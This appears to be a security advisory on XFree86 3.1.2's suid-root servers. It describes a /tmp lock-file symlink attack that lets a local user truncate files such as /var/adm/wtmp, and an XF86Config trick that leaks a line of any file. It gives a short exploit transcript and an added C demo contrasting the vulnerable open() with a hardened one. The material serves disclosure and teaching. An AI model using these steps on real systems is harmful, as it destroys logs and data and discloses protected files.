COMMAND

    XFree86 3.1.2 servers (/usr/X11R6/bin/XF86_*)

SYSTEMS AFFECTED

    All systems with XFree86 3.1.2 installed

PROBLEM

    There are security holes in XFree86 3.1.2, which installs its servers
    suid root (/usr/X11R6/bin/XF86_*).  When the server reads and writes
    files whose names an unprivileged user can influence, it does so with
    root privileges and without checking that the file it opens is the one
    it expects.  A local user can therefore overwrite arbitrary files and
    read limited portions of files he could not otherwise read.

    The first problem stems from the server opening its lock file,
    /tmp/.tX0-lock (for display :0), with the flags O_WRONLY|O_CREAT|O_TRUNC.
    open() with O_TRUNC follows symbolic links, so if a local user has
    first created that name as a symlink to some other file, the
    root-privileged server truncates the target and then writes its own
    pid into it.

    Other problems of the same kind exist in the server.  One example is
    that a user can name an arbitrary file as the XF86Config file: the
    server opens it as root, and the first line that fails to match the
    expected format is echoed back in an error message, disclosing one
    line of any file on the system.

    Exploit:

    $ ls -l /var/adm/wtmp
    -rw-r--r--   1 root     root       174104 Dec 30 08:31 /var/adm/wtmp
    $ ln -s /var/adm/wtmp /tmp/.tX0-lock
    $ startx
    (At this point exit X if it started, or else ignore any error messages)
    $ ls -l /var/adm/wtmp
    -r--r--r--   1 root     root           11 Dec 30 08:33 /var/adm/wtmp
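    The lock-file problem above, and the XF86Config one, share a single root
    cause: a suid-root program opening a path an unprivileged user controls,
    with no check on what is actually at that path.  The following is an
    added example, not code from the advisory or from XFree86, that replays
    the transcript against a disposable stand-in for /var/adm/wtmp in a temp
    directory and puts the vulnerable open() beside a hardened one.  Two
    things in it are assumptions rather than facts from the page: the
    11-byte "%10ld\n" pid record (chosen because it matches the 11-byte size
    the final ls shows), and the hardened pattern itself, which is the
    generic O_EXCL/O_NOFOLLOW/fstat() idiom and not necessarily what
    XFree86 3.2 did.

```c
#define _GNU_SOURCE          /* O_NOFOLLOW, mkdtemp, symlink */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed lock record: "%10ld\n" = 11 bytes, consistent with the size the
 * transcript's final ls shows.  Not taken from the advisory. */
#define PID_FMT "%10ld\n"
#define PID_LEN 11

/* The pattern the advisory describes: O_TRUNC follows a symlink sitting at
 * `path` and truncates whatever it points to. */
int lock_open_vulnerable(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened variant (generic idiom, not XFree86 3.2's actual fix): O_EXCL
 * fails with EEXIST if anything, a symlink included, already sits at
 * `path`; O_NOFOLLOW is a second line of defence; fstat() on the open
 * descriptor confirms we got a fresh regular file owned by us. */
int lock_open_hardened(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1
        || st.st_uid != geteuid()) {
        close(fd);
        return -1;
    }
    return fd;
}

static int write_pid(int fd)
{
    char buf[PID_LEN + 1];
    int n = snprintf(buf, sizeof buf, PID_FMT, (long)getpid());
    return (n == PID_LEN && write(fd, buf, PID_LEN) == PID_LEN) ? 0 : -1;
}

/* Creates the stand-in victim file holding `content` (constructed data). */
static int make_victim(const char *path, const char *content)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, content, strlen(content));
    close(fd);
    return n == (ssize_t)strlen(content) ? 0 : -1;
}

static off_t file_size(const char *path)
{
    struct stat st;
    return stat(path, &st) == 0 ? st.st_size : -1;
}

/* Replays the transcript without root: the point is the symlink
 * following, not the privilege.  Returns 0 when the vulnerable open
 * clobbers the victim and the hardened open refuses the planted link;
 * otherwise a bitmask of which expectation failed. */
int run_symlink_demo(void)
{
    char dir[] = "/tmp/xlockdemo.XXXXXX";
    char victim[64], lock[64];
    const char *orig = "constructed login records that should survive\n";
    int result = 0, fd = -1;

    if (!mkdtemp(dir))
        return 0x100;
    snprintf(victim, sizeof victim, "%s/wtmp", dir);
    snprintf(lock, sizeof lock, "%s/.tX0-lock", dir);

    /* attacker: ln -s wtmp .tX0-lock */
    if (make_victim(victim, orig) != 0 || symlink(victim, lock) != 0) {
        result |= 0x200;
        goto out;
    }

    /* vulnerable server start: the victim is truncated and now holds a pid */
    fd = lock_open_vulnerable(lock);
    if (fd < 0 || write_pid(fd) != 0)
        result |= 1;
    if (fd >= 0)
        close(fd);
    if (file_size(victim) != PID_LEN)
        result |= 2;

    /* restore the victim; the hardened open must refuse the planted link */
    if (make_victim(victim, orig) != 0) {
        result |= 0x200;
        goto out;
    }
    fd = lock_open_hardened(lock);
    if (fd >= 0) {
        close(fd);
        result |= 4;
    }
    if (file_size(victim) != (off_t)strlen(orig))
        result |= 8;

out:
    unlink(lock);
    unlink(victim);
    rmdir(dir);
    return result;
}

int main(void)
{
    int r = run_symlink_demo();
    printf("%s (result mask %#x)\n",
           r == 0 ? "vulnerable open followed the symlink, hardened open refused"
                  : "unexpected outcome", r);
    return r != 0;
}
```

    O_EXCL alone is what defeats the attack shown in the transcript; the
    fstat() check additionally catches a file that was swapped in by other
    means.  Neither addresses the XF86Config disclosure, where the file is
    meant to be user-selected: the only robust fix for a suid program is not
    to open user-influenced paths with root privileges at all, by dropping
    to the real uid before the open or by opening such files only after
    privileges are no longer needed.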

SOLUTION

    XFree86 3.2 has been released with this bug fixed; upgrade to it.